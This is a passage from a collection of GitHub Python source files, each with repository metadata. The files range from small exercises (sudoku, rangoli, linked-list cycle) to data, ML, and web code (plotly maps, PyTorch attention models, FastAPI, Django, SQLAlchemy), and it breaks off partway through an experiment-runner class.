143)\"],[1.0, \"rgb(0, 68, 136)\"]]\n\n#Defines the map\ndata = [ dict(\n type=\"choropleth\",\n colorscale = scl,\n autocolorscale = False,\n locations = df[\"code\"],\n z = df[\"total students\"].astype(float),\n locationmode = \"USA-states\",\n marker = dict(\n line = dict (\n color = \"rgb(255,255,255)\",\n width = 2\n ) ),\n colorbar = dict(\n title = \"Families\")\n ) ]\n\n#Defines the layout\nlayout = dict(\n title = \"Where Everyone is From!\",\n geo = dict(\n scope=\"usa\",\n projection=dict( type=\"albers usa\" ),\n showlakes = True,\n lakecolor = \"rgb(255, 255, 255)\"),\n )\n\n#Makes the data readable by iplot and then exports it to Internet\nfig = dict( data=data, layout=layout )\npy.iplot( fig, filename=\"October 14th Open House\" )\n","repo_name":"davis-cook98/ClassWork","sub_path":"OpenHouse.py","file_name":"OpenHouse.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34983418920","text":"from tkinter import *\nfrom tkinter import ttk\nimport locale\n\nlocale.setlocale(locale.LC_MONETARY, \"en_US.UTF-8\")\n\nwin = Tk()\n\ndataUser = {\n \"id\": {\n \"nombre\": \"Juan Daniel\",\n \"apellido\": \"Perez\",\n \"cc\":1005090349,\n \"saldo\": 1000000,\n \"clave\": 1234,\n \"cuenta\": \"Ahorros\",\n \"fecha creacion\": \"12/12/2020\",\n \"fecha modificacion\": \"12/12/2020\",\n \"estado\": \"Activo\",\n \"tipo\": \"Natural\",\n \"email\": \" daniel@gmail.com\",\n \"telefono\": 3003764571,\n \"direccion\": \"Calle 12 # 12 - 12\",\n \"ciudad\": \"Bogota\",\n \"pais\": \"Colombia\",\n \"genero\": \"Masculino\",\n \"fecha nacimiento\": \"12/12/1990\",\n \"edad\": 30,\n \"estado civil\": \"Soltero\",\n \"profesion\": \"Estudiante\",\n \"nivel educativo\": \"Universitario\",\n \"ocupacion\": \"Estudiante\",\n \"empresa\": \"Universidad Nacional\",\n \"cargo\": \"Estudiante\",\n \"ingresos\": 1000000,\n \"egresos\": 0,\n \n\n }\n}\n\nwin.resizable(0, 0)\nwin.title(\"Cajero Automatico \")\nopciones =[\"Nequi\", \"Bancolombia\", \"Daviviena\"]\nvalor_en_dolar_formateado = locale.currency(dataUser[\"id\"][\"saldo\"], grouping=True)\n\ncb1 = ttk.Combobox(win, values=opciones, width=10)\nprint(cb1.get())\ncb1.grid(row=1, column=1, padx=5, pady=5)\nwin.geometry(\"500x500\")\n\nwin.mainloop()\n\n","repo_name":"klayngo/tkinterPythonInterfaceBasic","sub_path":"usuario.py","file_name":"usuario.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70759353124","text":"from operator import concat\nfrom tabnanny import verbose\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport numpy as np\nclass ScaledDotProductAttention(nn.Module):\n \"\"\" Scaled Dot-Product Attention \"\"\"\n\n def __init__(self, scale):\n super().__init__()\n\n self.scale = scale\n self.softmax = nn.Softmax(dim=2)\n\n def forward(self, q, k, v, mask=None):\n u = torch.bmm(q, k.transpose(1, 2)) # 1.Matmul\n u = u / self.scale # 2.Scale\n\n if mask is not None:\n u = u.masked_fill(mask, -np.inf) # 3.Mask\n\n attn = self.softmax(u) # 4.Softmax\n output = torch.bmm(attn, v) # 5.Output\n\n return attn, output\n\nclass MultiHeadAttention(nn.Module):\n \"\"\" Multi-Head Attention \"\"\"\n\n def __init__(self, n_head, d_k_, d_v_, d_k, d_v, d_o):\n super().__init__()\n\n self.n_head = n_head\n self.d_k = d_k\n self.d_v = d_v\n\n self.fc_q = nn.Linear(d_k_, n_head * d_k)\n self.fc_k = nn.Linear(d_k_, n_head * d_k)\n self.fc_v = nn.Linear(d_v_, n_head * d_v)\n\n self.attention = ScaledDotProductAttention(scale=np.power(d_k, 0.5))\n\n self.fc_o = nn.Linear(n_head * d_v, d_o)\n\n def forward(self, q, k, v, mask=None):\n\n n_head, d_q, d_k, d_v = self.n_head, self.d_k, self.d_k, self.d_v\n\n batch, n_q, d_q_ = q.size()\n batch, n_k, d_k_ = k.size()\n batch, n_v, d_v_ = v.size()\n\n q = self.fc_q(q) # 1.单头变多头\n k = self.fc_k(k)\n v = self.fc_v(v)\n q = q.view(batch, n_q, n_head, d_q).permute(2, 0, 1, 3).contiguous().view(-1, n_q, d_q)\n k = k.view(batch, n_k, n_head, d_k).permute(2, 0, 1, 3).contiguous().view(-1, n_k, d_k)\n v = v.view(batch, n_v, n_head, d_v).permute(2, 0, 1, 3).contiguous().view(-1, n_v, d_v)\n\n if mask is not None:\n mask = mask.repeat(n_head, 1, 1)\n attn, output = self.attention(q, k, v, mask=mask) # 2.当成单头注意力求输出\n\n output = output.view(n_head, batch, n_q, d_v).permute(1, 2, 0, 3).contiguous().view(batch, n_q, -1) # 3.Concat\n output = self.fc_o(output) # 4.仿射变换得到最终输出\n\n return attn, output\n\nclass SelfAttention(nn.Module):\n \"\"\" Self-Attention \"\"\"\n\n def __init__(self, n_head, d_k, d_v, d_x, d_o):\n super().__init__()\n self.wq = nn.Parameter(torch.Tensor(d_x, d_k))\n self.wk = nn.Parameter(torch.Tensor(d_x, d_k))\n self.wv = nn.Parameter(torch.Tensor(d_x, d_v))\n\n self.mha = MultiHeadAttention(n_head=n_head, d_k_=d_k, d_v_=d_v, d_k=d_k, d_v=d_v, d_o=d_o)\n\n self.init_parameters()\n\n def init_parameters(self):\n for param in self.parameters():\n stdv = 1. / np.power(param.size(-1), 0.5)\n param.data.uniform_(-stdv, stdv)\n\n def forward(self, x, mask=None):\n q = torch.matmul(x, self.wq) \n k = torch.matmul(x, self.wk)\n v = torch.matmul(x, self.wv)\n\n attn, output = self.mha(q, k, v, mask=mask)\n\n return attn, output\n\n\n\nclass GRU_att(torch.nn.Module):\n def __init__(self, args, vectors=None):\n super(GRU_att, self).__init__()\n\n # print(vectors.shape)\n self.embedding = nn.Embedding(args.vocab_size+1, args.embedding_dim)\n if vectors is not None:\n vectors = np.row_stack((vectors, np.zeros(args.embedding_dim)))\n self.embedding.weight.data.copy_(torch.Tensor(vectors))\n\n self.args = args\n\n self.name_length = args.name_max_text_len\n self.desc_legnth = args.desc_max_text_len\n\n self.hidden_dim = args.hidden_dim\n self.gru_layers = args.lstm_layers\n \n self.name_bigru = nn.GRU(args.embedding_dim, self.hidden_dim // 2, num_layers=self.gru_layers, bidirectional=args.bidirectional, batch_first=True)\n self.name_att = SelfAttention(n_head=args.attn_head, d_k=self.hidden_dim, d_v=self.hidden_dim // 2, d_x=self.hidden_dim, d_o=self.hidden_dim)\n\n self.desc_bigru = nn.GRU(args.embedding_dim, self.hidden_dim // 2, num_layers=self.gru_layers, bidirectional=args.bidirectional, batch_first=True)\n self.desc_att = SelfAttention(n_head=args.attn_head, d_k=self.hidden_dim, d_v=self.hidden_dim // 2, d_x=self.hidden_dim, d_o=self.hidden_dim)\n\n self.fc1 = nn.Linear(self.hidden_dim * 2, self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, args.label_size)\n\n def forward(self, name, name_length, desc, desc_length):\n name = self.embedding(name)\n name_pack = pack_padded_sequence(input=name, lengths=name_length, batch_first=True, enforce_sorted=False)\n name, _ = self.name_bigru(name_pack)\n name, _ = pad_packed_sequence(name, batch_first=True, total_length=self.name_length)\n print(name[0])\n input()\n _, name = self.name_att(name)\n name = torch.sum(name, dim=1)\n\n desc = self.embedding(desc)\n desc_pack = pack_padded_sequence(input=desc, lengths=desc_length, batch_first=True, enforce_sorted=False)\n desc, _ = self.desc_bigru(desc_pack)\n desc, _ = pad_packed_sequence(desc, batch_first=True, total_length=self.desc_legnth)\n _, desc = self.desc_att(desc)\n desc = torch.sum(desc, dim=1)\n\n feat = torch.cat([name, desc], dim=1)\n y = self.fc1(feat)\n y = self.fc2(y)\n return y","repo_name":"isharrisleung/App_classify","sub_path":"models/GRU_att.py","file_name":"GRU_att.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29498963711","text":"import pandas as pd\nimport logging\n\nlogger = logging.getLogger(__name__)\nlog_level = logging.INFO\nlogging.basicConfig(level=log_level)\n\n\nclass BaseFanalytics:\n \"\"\"\n Class Variables:\n\n self.years - the years to collect data\n self.data - DataFrame with all data\n \"\"\"\n def __init__(self, years):\n \"\"\"\n :param years: an array of years to collect\n \"\"\"\n if type(years) is not list:\n logger.error(f'years parameter must be an array')\n exit(0)\n self.years = years\n self.data = pd.DataFrame()\n self.parse_data()\n\n def parse_data(self):\n for year in self.years:\n self.data = pd.read_csv(\n 'https://github.com/guga31bb/nflfastR-data/'\n 'blob/master/data/play_by_play_'\n + str(year) + '.csv.gz?raw=True',\n compression='gzip', low_memory=False)\n self.data = self.data.append(self.data, sort=True)\n self.data.reset_index(drop=True, inplace=True)\n\n def _clean_data(self):\n \"\"\"\n operations to clean self.data\n\n :return: None\n \"\"\"\n # ensure all 'pass' type plays are labeled pass\n # and that all run plays are correctly labeled run\n self.data.loc[self.data['pass'] == 1, 'play_type'] = 'pass'\n self.data.loc[self.data['rush'] == 1, 'play_type'] = 'run'","repo_name":"KrisSoto/fanalytics","sub_path":"fanalytics/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2016444210","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 22 20:53:32 2018\n\n@author: pineapple\n\"\"\"\n\n'''\n给定一个链表,返回链表开始入环的第一个节点。 如果链表无环,则返回 null。\n\n说明:不允许修改给定的链表。\n\n进阶:\n你是否可以不用额外空间解决此题?\n'''\n\n'''\n别人的: 时间复杂度O(n^2) 空间复杂度O(1)\n思路:\n\n     环路周长L ----*相遇点\n      | |\n | |\n *-------*---- 起点到相遇点相距M\n head K 起点 \n \n那么我们有,快慢指针相遇时所走过的步数: \nstep_slow = K + M \nstep_faster = K + M + n*L \n又因为快指针每次都多走一步: \nstep_faster = 2 * step_slow \n由以上三个公式可以推断出 \nK = (n-1)L + L - M \n所以,当快慢指针在相遇点相遇时。\n假设一个新的指针point从head开始往前走,慢指针也往前走,步长为1\n那么当point走到起点时,慢指针也会到起点\n即 point == slow时,该点为环形起点\n\n'''\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n fast = head\n slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n point = head\n while point != slow:\n point = point.next\n slow = slow.next\n return point\n return ","repo_name":"pppineapple/LeetCode","sub_path":"Algorithms/环形链表II.py","file_name":"环形链表II.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33368213803","text":"from databases import Database\nfrom sqlalchemy import Column, Integer, MetaData, String, Table, create_engine\n\nDATABASE_URL = \"sqlite:///./fastapi.db\"\n\nengine = create_engine(DATABASE_URL)\n\nmetadata = MetaData()\n\n\nArticle = Table(\n \"articles\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"title\", String(50), nullable=False, unique=True),\n Column(\"description\", String(100), nullable=False),\n)\n\nUser = Table(\n \"users\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"username\", String(50), nullable=False, unique=True),\n Column(\"email\", String(50), nullable=False, unique=True),\n Column(\"password\", String(500), nullable=False),\n)\n\n\ndatabase = Database(DATABASE_URL)\n","repo_name":"ivanlegranbizarro/asyncFastapi","sub_path":"database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15290849077","text":"'''\r\nProblem statement:\r\nhttps://www.hackerrank.com/challenges/alphabet-rangoli/problem\r\n'''\r\n\r\ndef print_rangoli(size):\r\n # your code goes here\r\n i = 97 + size -1\r\n line = []\r\n s= ''\r\n while(i>=97):\r\n temp = s.rjust((size-1)*2,'-')+chr(i)+\"\".join(reversed(s.rjust((size-1)*2,'-')))\r\n line.append(temp);\r\n s += chr(i)+'-'\r\n i -= 1\r\n\r\n for l in range(0,len(line)):\r\n print(line[l])\r\n length = len(line)-2\r\n while(length>=0):\r\n print(line[length])\r\n length -= 1\r\n \r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n print_rangoli(n)","repo_name":"jaikishanEngg/HackerRank_Python_Practice","sub_path":"Strings_AlphabetRangoli.py","file_name":"Strings_AlphabetRangoli.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39588639744","text":"def print_grid(arr): \r\n t=len(grid)\r\n for i in range(0,t):\r\n m=grid[0]\r\n del grid[0]\r\n for i in m:\r\n print(i,end=\"\")\r\n print('\\t')\r\n\r\n\t\t\r\ndef find_empty_location(arr,l): \r\n\tfor row in range(9): \r\n\t\tfor col in range(9): \r\n\t\t\tif(arr[row][col]==0): \r\n\t\t\t\tl[0]=row \r\n\t\t\t\tl[1]=col \r\n\t\t\t\treturn True\r\n\treturn False\r\ndef used_in_row(arr,row,num): \r\n\tfor i in range(9): \r\n\t\tif(arr[row][i] == num): \r\n\t\t\treturn True\r\n\treturn False\r\n\r\ndef used_in_col(arr,col,num): \r\n\tfor i in range(9): \r\n\t\tif(arr[i][col] == num): \r\n\t\t\treturn True\r\n\treturn False\r\ndef used_in_box(arr,row,col,num): \r\n\tfor i in range(3): \r\n\t\tfor j in range(3): \r\n\t\t\tif(arr[i+row][j+col] == num): \r\n\t\t\t\treturn True\r\n\treturn False\r\ndef check_location_is_safe(arr,row,col,num): \r\n\treturn not used_in_row(arr,row,num) and not used_in_col(arr,col,num) and not used_in_box(arr,row - row%3,col - col%3,num) \r\n\r\ndef solve_sudoku(arr): \r\n\tl=[0,0] \r\n\tif(not find_empty_location(arr,l)): \r\n\t\treturn True\r\n\trow=l[0] \r\n\tcol=l[1] \r\n\tfor num in range(1,10): \r\n\t\tif(check_location_is_safe(arr,row,col,num)): \r\n\t\t\tarr[row][col]=num\r\n\t\t\tif(solve_sudoku(arr)): \r\n\t\t\t\treturn True\r\n\t\t\tarr[row][col] = 0\r\n\treturn False\r\n\r\ngrid=[]\r\nt=9\r\nwhile(t>0):\r\n t=t-1\r\n l=input()\r\n l=list(l)\r\n l=[int(l[i]) for i in range(0,len(l))]\r\n grid.append(l)\r\nif(solve_sudoku(grid)): \r\n print_grid(grid) \r\n","repo_name":"Manthanc007/APS-2o2o","sub_path":"Projecteuler1.py","file_name":"Projecteuler1.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9229377834","text":"# tooltip.py: -*- Python -*- DESCRIPTIVE TEXT.\n\nfrom qt import *\nfrom util import *\n\nclass Tooltip(QLabel):\n def __init__(self, text, bgcolor=\"#ffd700\",fgcolor=\"#000000\",delay=1000):\n self.delay = delay\n QLabel.__init__(self, None, \"tooltip\", Qt.WStyle_StaysOnTop\n | Qt.WStyle_Customize\n | Qt.WStyle_NoBorder\n | Qt.WStyle_Tool)\n self.setMargin(1)\n self.setIndent(0)\n self.setAutoMask(FALSE)\n self.setFrameStyle(QFrame.Plain | QFrame.Box)\n self.setLineWidth(1)\n self.polish()\n self.setText(text)\n self.adjustSize()\n\n # set the pallete...\n pal = QPalette()\n cg = QColorGroup()\n cg.setColor(QColorGroup.Background, QColor(bgcolor))\n cg.setColor(QColorGroup.Foreground, QColor(fgcolor))\n pal.setActive(cg)\n pal.setInactive(cg)\n self.setPalette(pal)\n\n self.enter_timer_id = None\n self.leave_timer_id = None\n\n\n def set_tooltip(self, text):\n self.text = text\n self.setText(text)\n\n\n def clear_tooltip(self):\n self.text = ''\n self.setText('')\n \n\n def addWidget(self, widget):\n #print \"adding widget\", widget\n widget.installEventFilter(self)\n\n\n def removeWidget(self, widget):\n #print \"removing widget\", widget\n widget.removeEventFilter(self)\n\n\n def killCustomTimers( self ):\n if self.enter_timer_id:\n self.killTimer( self.enter_timer_id )\n self.enter_timer_id = None\n if self.leave_timer_id:\n self.killTimer( self.leave_timer_id )\n self.leave_timer_id = None\n\n\n def timerEvent( self, ev ):\n if ev.timerId() == self.enter_timer_id:\n self.tooltip_open()\n elif ev.timerId() == self.leave_timer_id:\n self.tooltip_close()\n self.killCustomTimers()\n\n\n def eventFilter(self, obj, ev):\n type = ev.type()\n #print obj, type\n if type == QEvent.Enter:\n self.killCustomTimers()\n self.enter_timer_id = self.startTimer(self.delay)\n #print \"tip!\"\n self.event_widget = obj\n elif type == QEvent.Leave:\n self.killCustomTimers()\n self.leave_timer_id = self.startTimer(self.delay)\n #print \"remove tip!\"\n self.event_widget = None\n return FALSE ## Always return unhandled for this kind of filter!!!\n\n\n def tooltip_open(self):\n if not self.text:\n return\n \n try:\n pos = self.event_widget.mapToGlobal(\n QPoint(0, self.event_widget.height()))\n self.move(pos.x(), pos.y())\n self.show()\n self.setFixedSize( self.sizeHint() )\n except:\n pass\n\n\n def tooltip_close(self):\n self.hide()\n","repo_name":"multani/kodos-qt3","sub_path":"modules/tooltip.py","file_name":"tooltip.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15359618839","text":"from typing import Any\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom httpx import AsyncClient\n\nfrom app import models, schemas\nfrom app.api import deps\nfrom app.core.config import settings\n\nrouter = APIRouter()\n\n\n@router.get(\n \"/\",\n response_model=schemas.CashBack,\n status_code=status.HTTP_200_OK,\n responses=deps.GET_TOKEN_USER_RESPONSES\n | {503: {\"model\": schemas.HTTPError}},\n)\nasync def get_cashback(\n async_client: AsyncClient = Depends(deps.get_async_client),\n token_user: models.User = Depends(deps.get_token_user),\n) -> Any:\n # get user purchases\n user_purchases = token_user.purchases_\n\n # sum internal cashback\n accumulated_cashback = 0\n for purchase in user_purchases:\n accumulated_cashback += float(purchase.cashback_value)\n\n # get cashback of external service\n url = f\"{settings.EXTERNAL_CASHBACK_API}?cpf={token_user.cpf}\"\n resp = await async_client.get(url)\n\n external_cashback = resp.json().get(\"cashback\")\n\n # if external service is unavailable return 503\n if resp.status_code != 200 or not external_cashback:\n raise HTTPException(\n status_code=status.HTTP_503_SERVICE_UNAVAILABLE,\n detail=(\n \"The service is currently unavailable, please try again later.\"\n ),\n )\n\n accumulated_cashback += external_cashback\n\n return schemas.CashBack(cashback=accumulated_cashback)\n","repo_name":"wlsouza/cashbackgb","sub_path":"app/api/api_v1/endpoints/cashback.py","file_name":"cashback.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12534346894","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom tools.models import Tool,UserProfile,Rent,RentRequest\n\n\"\"\"\n\tdetail(request, tool_id)\n\tView handler for tool detail page\n\"\"\"\ndef detail(request, tool_id):\n delete = None\n user = None\n rent = None\n if request.user.is_authenticated():\n tool = Tool.objects.filter(pk=tool_id)\n user_profile = UserProfile.objects.get(user=request.user)\n if len(tool) == 0:\n return HttpResponseRedirect(reverse('tools:tools'))\n else:\n tool = Tool.objects.get(pk=tool_id)\n if tool.owner.community == user_profile.community:\n request_list = RentRequest.objects.filter()\n tool_request_list = RentRequest.objects.filter(tool_requested = tool, req_status = 0)\n myrequest = RentRequest.objects.filter(requester = user_profile, tool_requested = tool, req_status = 0)\n if (tool.rentable == 0): \n checkrent = Rent.objects.filter(tool_rented = tool, returned = 0)\n if len(checkrent) != 0:\n rent = Rent.objects.get(tool_rented = tool, returned = 0)\n context = {'myrequest':myrequest, 'tool': tool, 'rent': rent, 'user': user_profile, 'request_list' : request_list, 'tool_request_list' : tool_request_list}\n return render(request, 'tools/detail.html', context)\n else:\n return HttpResponseRedirect(reverse('tools:tools'))\n return HttpResponseRedirect(reverse('tools:login'))","repo_name":"mbd9441/ToolShare","sub_path":"tools/views/detail_controller.py","file_name":"detail_controller.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2804918176","text":"#!/usr/bin/env python3\nimport io, sys, json, subprocess, os, re, pprint\n\npp = pprint.PrettyPrinter(indent=4).pprint\nSA_CMD = \"sa --separate-times --sort-real-time --user-summary\"\nSA_COLS = [\n\t{\"name\": \"quantity\",\"suffix\":\"None\"},\n\t{\"name\": \"elapsed_time_minutes\",\"suffix\":\"re\"},\n\t{\"name\": \"user_cputime_seconds\",\"suffix\":\"u\"},\n\t{\"name\": \"user_cputime_seconds\",\"suffix\":\"s\"},\n\t{\"name\": \"average_iops\",\"suffix\":\"avio\"},\n\t{\"name\": \"memory_kilobytes\",\"suffix\":\"k\"},\n]\n\n\ndef getStats():\n proc = subprocess.Popen(SA_CMD.split(' '), stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=False,env=os.environ.copy())\n stdout, stderr = proc.communicate()\n exit_code = proc.wait()\n\n stdout = stdout.decode().strip().splitlines()\n Stats = {}\n R = []\n def addUserStat(stats):\n if len(stats) == len(SA_COLS):\n stats = ['_TOTALS',*stats]\n username = stats[0]\n Stats[username] = {}\n for index, stat in enumerate(stats):\n SA_COL = SA_COLS[index-1]\n if SA_COL['suffix'] and stat.endswith(SA_COL['suffix']):\n stat = re.sub(\"{}$\".format(SA_COL['suffix']),'',stat)\n Stats[username][SA_COL['name']] = stat\n\n return Stats #[username][SA_COL['name']]\n \n for index, line in enumerate(stdout):\n line = [l for l in line.split(' ') if len(l)>0]\n USER_STAT = addUserStat(line)\n R.append(USER_STAT)\n return R\n\nif __name__ == \"__main__\":\n print(json.dumps(getStats()))\n sys.exit(0)\n","repo_name":"binRick/python-parse-process-accounting","sub_path":"parse_process_accounting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21817891976","text":"from sqlalchemy import create_engine\nfrom dbfread import DBF\nimport json,urllib,math,pyodbc,pandas as pd\nfrom datetime import datetime\n\n#Se establece la coneccion a la base de datos.\ndef conection():\n\n ConnetionDB = 'Connectionlocal'\n\n with open('DBconfig.json') as conn:\n\n config = json.loads(conn.read())\n database_name = config[ConnetionDB][\"DB_NAME\"]\n database_user = config[ConnetionDB][\"DB_USER\"]\n database_password = config[ConnetionDB][\"DB_PASSWORD\"]\n database_server = config[ConnetionDB][\"SERVER\"]\n dbms_driver = config[ConnetionDB][\"DRIVER\"]\n\n ConnectionString = \"DRIVER={0};SERVER={1};DATABASE={2};UID={3};PWD={4}\".format(dbms_driver, database_server, database_name, database_user, database_password)\n try: \n \n quoted = urllib.parse.quote_plus(ConnectionString)\n engine = create_engine('mssql+pyodbc:///?odbc_connect={}'.format(quoted))\n return engine\n\n except Exception as e:\n print(\"Error connecting to database \" + str(e)) \n\n\ndef load_json():\n\n with open('config.json') as conn:\n \n config = json.loads(conn.read())\n\n return config\n\n\ndef load_to_sqlserver(conn,df_data,name_table,sucursal,schema):\n\n df_data['sucursal']= sucursal\n \n df_num_of_cols = len(df_data.columns)\n \n chunknum = math.floor(2100/df_num_of_cols)\n \n df_data.to_sql(name_table,con=conn,index=False,schema=schema,if_exists='append', chunksize=chunknum,method='multi')\n\n\n\n \ndef main():\n conn = conection()\n\n loaded_json = load_json()\n\n for num,config in enumerate(loaded_json):\n\n dbf_frame = pd.DataFrame(DBF(config[\"url\"]),columns = config[\"get_columns\"])\n\n dbf_frame_filtered = dbf_frame[dbf_frame[config[\"condition_columns\"]] > datetime.strptime(config[\"condition_value\"],'%Y-%m-%d').date()].fillna(0).astype(str)\n \n if dbf_frame_filtered.empty != True:\n\n load_to_sqlserver(conn,dbf_frame_filtered,config[\"sink\"],config[\"sucursal\"],config[\"schema\"])\n\n loaded_json[num][\"condition_value\"] = str(dbf_frame_filtered[config[\"condition_columns\"]].max())\n\n json.dump(loaded_json, open(\"config.json\", \"w\"), indent = 4)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"AlexanderRosario/Load_increase","sub_path":"incremental.py","file_name":"incremental.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11361194684","text":"import importlib.resources as pkg_resources\nimport json\nimport logging\nimport math\nimport os\nimport random\nfrom collections import OrderedDict\nfrom datetime import datetime\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as _default_module_optim\nfrom pandas import DataFrame\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\n\nfrom .config import update_config, init_obj\nfrom .dataset import ScientificPaperDataset\nfrom .modules import SentenceClassifier\nfrom .trainer import Trainer\n\nMAX_INT = 4294967296\n\nlogger = logging.getLogger(__name__)\n\n\nclass Experiment(object):\n \"\"\"\n The ``Experiment`` class helps to perform experiments with sentence classification models.\n It reads the configuration file, initializes components\n (data loaders, model, optimizer, criterion, metric, trainer),\n provides methods to perform training and evaluation.\n \"\"\"\n\n def __init__(\n self,\n config: Dict = None,\n data: DataFrame = None,\n resume: str = None,\n model=None,\n trainer=None,\n criterion=None,\n metric=None,\n optimizer=None,\n device=None,\n default_config_file: str = 'default_config.json'\n ):\n super().__init__()\n\n # Configuration\n if not resume:\n with pkg_resources.open_text(__package__, default_config_file) as text:\n default_config = json.load(text, object_hook=OrderedDict)\n if config is None:\n config = default_config\n else:\n config = update_config(default_config, config)\n self.config = config\n else:\n with open(os.path.join(resume, 'config.json'), 'r') as f:\n config = json.load(f, object_hook=OrderedDict)\n self.config = config\n\n # Logger\n self.default_logger(**config['logger'])\n\n # Random seeds\n self.set_random_seeds()\n\n # Device\n if device is None:\n device = self.default_device()\n logger.info(f'Use device: {device}')\n self.device = device\n\n # Paths\n self.set_paths()\n\n # Data, datasets, data loaders\n self.data = data\n self.train_data, self.dev_data, self.test_data = self.split_data(config['data'])\n\n config['dataset']['labels'] = list(self.data['label'].cat.categories)\n\n self.train_dataset = ScientificPaperDataset(self.train_data.copy())\n self.dev_dataset = ScientificPaperDataset(self.dev_data.copy())\n self.test_dataset = ScientificPaperDataset(self.test_data.copy())\n\n self.train_data_loader = DataLoader(self.train_dataset,\n batch_size=config['data_loaders']['train_batch_size'],\n shuffle=True)\n self.dev_data_loader = DataLoader(self.dev_dataset,\n batch_size=config['data_loaders']['dev_batch_size'],\n shuffle=False)\n self.test_data_loader = DataLoader(self.test_dataset,\n batch_size=config['data_loaders']['test_batch_size'],\n shuffle=False)\n\n # Model\n if model is None:\n model = self.default_model(config['model'])\n self.model = model\n\n # Optimizer, criterion, metrics, trainer...\n if optimizer is None:\n optimizer = self.default_optimizer(config['optimizer'])\n self.optimizer = optimizer\n\n if criterion is None:\n criterion = self.default_criterion()\n self.criterion = criterion\n\n if metric is None:\n metric = config['metric']\n self.metric = metric\n\n if trainer is None:\n trainer = self.default_trainer()\n self.trainer = trainer\n\n if resume:\n self.resume(resume)\n\n def set_random_seeds(self):\n seeds_config = self.config['seeds']\n if seeds_config['py_seed'] is None:\n seeds_config['py_seed'] = random.randint(0, MAX_INT)\n if seeds_config['np_seed'] is None:\n seeds_config['np_seed'] = random.randint(0, MAX_INT)\n if seeds_config['torch_seed'] is None:\n seeds_config['torch_seed'] = random.randint(0, MAX_INT)\n random.seed(seeds_config['py_seed'])\n np.random.seed(seeds_config['np_seed'])\n torch.manual_seed(seeds_config['torch_seed'])\n logger.info(f\"Python random seed: {seeds_config['py_seed']}\")\n logger.info(f\"NumPy random seed: {seeds_config['np_seed']}\")\n logger.info(f\"Torch random seed: {seeds_config['torch_seed']}\")\n\n def set_paths(self):\n paths_config = self.config['paths']\n output_dir = paths_config['output_dir']\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n logger.info(f'Create output directory: {output_dir}')\n\n if 'experiment_dir' not in paths_config:\n current_time = datetime.now().strftime('%y%m%d_%H-%M-%S')\n if self.config['dataset']['name'] is not None:\n experiment_name = '{}_{}'.format(self.config['dataset']['name'], current_time)\n else:\n experiment_name = current_time\n experiment_dir = os.path.join(output_dir, experiment_name)\n if not os.path.exists(experiment_dir):\n os.mkdir(experiment_dir)\n logger.info(f'Create experiment directory: {experiment_dir}')\n log_dir = os.path.join(experiment_dir, 'log')\n\n paths_config['experiment_dir'] = experiment_dir\n paths_config['log_dir'] = log_dir\n\n def default_logger(self, **kwargs):\n logging.basicConfig(format=kwargs['format'], level=kwargs['level'])\n\n def default_device(self):\n return torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n def split_data(self, config):\n size = len(self.data)\n dev_size = config['dev_ratio'] if isinstance(config['dev_ratio'], int) \\\n else math.ceil(config['dev_ratio'] * size)\n test_size = config['test_ratio'] if isinstance(config['test_ratio'], int) \\\n else math.ceil(config['test_ratio'] * size)\n rs1, rs2 = config['random_states']\n if rs1 is None:\n rs1 = random.randint(0, MAX_INT)\n if rs2 is 